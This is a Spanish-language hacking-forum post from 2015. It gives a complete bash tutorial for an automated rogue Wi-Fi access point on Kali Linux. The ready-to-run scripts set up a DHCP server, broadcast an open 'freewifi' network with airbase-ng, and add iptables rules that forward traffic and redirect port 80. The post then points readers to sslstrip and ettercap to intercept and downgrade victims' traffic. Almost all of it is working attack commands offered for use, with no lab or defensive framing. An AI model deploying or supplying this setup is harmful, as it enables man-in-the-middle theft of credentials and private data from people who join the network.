Hack x Crack - Comunidad de Seguridad informática

Programación => Scripting => Batch / Bash => Mensaje iniciado por: uchihacrawler en Septiembre 05, 2015, 04:00:59 pm

Título: FAKE ACCES POINT
Publicado por: uchihacrawler en Septiembre 05, 2015, 04:00:59 pm
Buenas a todo, supongo que este tema se abrá tocado ya alguna vez, lo he buscado por el foro y algún que otro tema he encontrado.
El tema de este post es la creación de un fake acces point automatizado hecho en bash.
Será necesario disponer de:
- Antena wifi que permita la monitorización.
- Kali Linux.

Primer paso:
Descubrir cual es nuestra Gateway:
Código: [Seleccionar]
route -nEn mi caso 192.168.1.1
Instalar el servidor dhcp en Kali linux:
Código: [Seleccionar]
apt-get install dhcp3-server
Segundo paso:
Configurar el servidor dhcp. He creado un script para que nos cree el archivo *.conf y escriba las líneas de comando para no tener que teclear todo. Si os fijais que hecho que por pantalla por lo menos diga algo como configurando el servidor y espere 5 segundo para volver a poner servidor configurado, pero no hace falta, mas que nada, para que salga algo en pantalla jaja.

Crearemos un archivo llamado DHCP3.sh y le daremos todos los permisos con +x
Código: [Seleccionar]
touch DHCP3.sh && chmod +x DHCP3.sh
nano DCHP3.sh

Y copiamos el siguiente código:
Código: [Seleccionar]
#!/bin/bash
echo :::::::::::::::: CONFIGURANDO SERVIDOR DHCP ::::::::::::::::::::
touch /etc/dhcpd.conf && echo -e "authoritative\ndefault-lease-time 600\nmax-lease-time 7200\nsubnet 192.168.2.0 netmask 255.255.255.0 {\noption routers 192.168.2.1\noption subnet-mask 255.255.255.0\noption domain-name "freewifi"\noption domain-name-servers 192.168.2.1\nrange 192.168.2.2 192.168.2.50\n} " > /etc/dhcpd.conf
sleep 5
echo ................ SERVIDOR DHCP CONFIGURADO .....................

Si analizamos el codigo y estais familiarizados con dhcp y subnets os fijais que he creado otro rango para que no interfiera con la ip de mi router. Por cierto, le he llamado freewifi, pero podéis ponerle el nombre que querais.

Una vez configurado el servidor dhcp, vamos a crear el punto de acceso.
Volveremos a crear un archivo llamado fakeacces.sh

Código: [Seleccionar]
touch fakeacces.sh && chmod +x fakeacces.sh
nano fakeacces.sh

En el archivo escribiremos el siguiente código: (Teniendo en cuenta que mi antena que va a monitorizar es la wlan1 y mi "mon interface" es wlan1mon. Debereis poner la vuestra.
Código: [Seleccionar]
#!/bin/bash
airmon-ng start wlan1
airbase-ng -c 11 -e freewifi wlan1mon

Lo siguiente será crear el archivo para enroutar y redireccionar nuestra wifi y hacer que pase todo lo del puerto 80 por el que queramos.
Creamos otro archivo llamado accespoint.sh
Código: [Seleccionar]
touch routing.sh && chmod +x routing.shY en el escribimos los siguiente. (Vuelvo a remarcar que debido a que mi gateway es 192.168.1.1 he tenido que configurar creando subnet 192.168.2.0. Si fuera el caso de que vuestra gateway fuese 192.168.0.1, vuestra subnet podría ser 192.168.1.0.
el enroutamiento lo hago por mi otra tarjeta lan, que en este caso es wlan0 si vosotros vais por cable sera eth0
Código: [Seleccionar]
#!/bin/bash
echo ::::::::::::::::::CONFIGURANDO REDIRECCIONAMIENTO:::::::::::::::::::::::::
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
echo ::::::::::::::::::::::..CONFIGURADO:::::::::::::::::::::::::::

Ahora ya solo nos quedará ejecutar cada uno de los archivos creados.
Código: [Seleccionar]
./DHCP3.sh
./fakeacces.sh

Abrimos nueva terminal:
Código: [Seleccionar]
./routing.sh
Una vez creado el punto de acceso podeis hacer arpspoofing con el ettercap y escuchar lo del puerto 8080 a través de sslstrip. En terminales diferentes, no cerreis ninguna de las creadas.
Código: [Seleccionar]
sslstrip -f -p -k 8080
Código: [Seleccionar]
ettercap -p -u -T -q -i at0Aunque esto último ya es tema a parte por si quieres husmear y luego usar el XPLICO.


Espero que os guste, supongo que se puede hacer aún más senzillo, no se si haciendo un script en bash con un gnome-terminal que incluya todos los archivos creados y los vaya abriendo en terminales diferentes.

Un saludo a todos.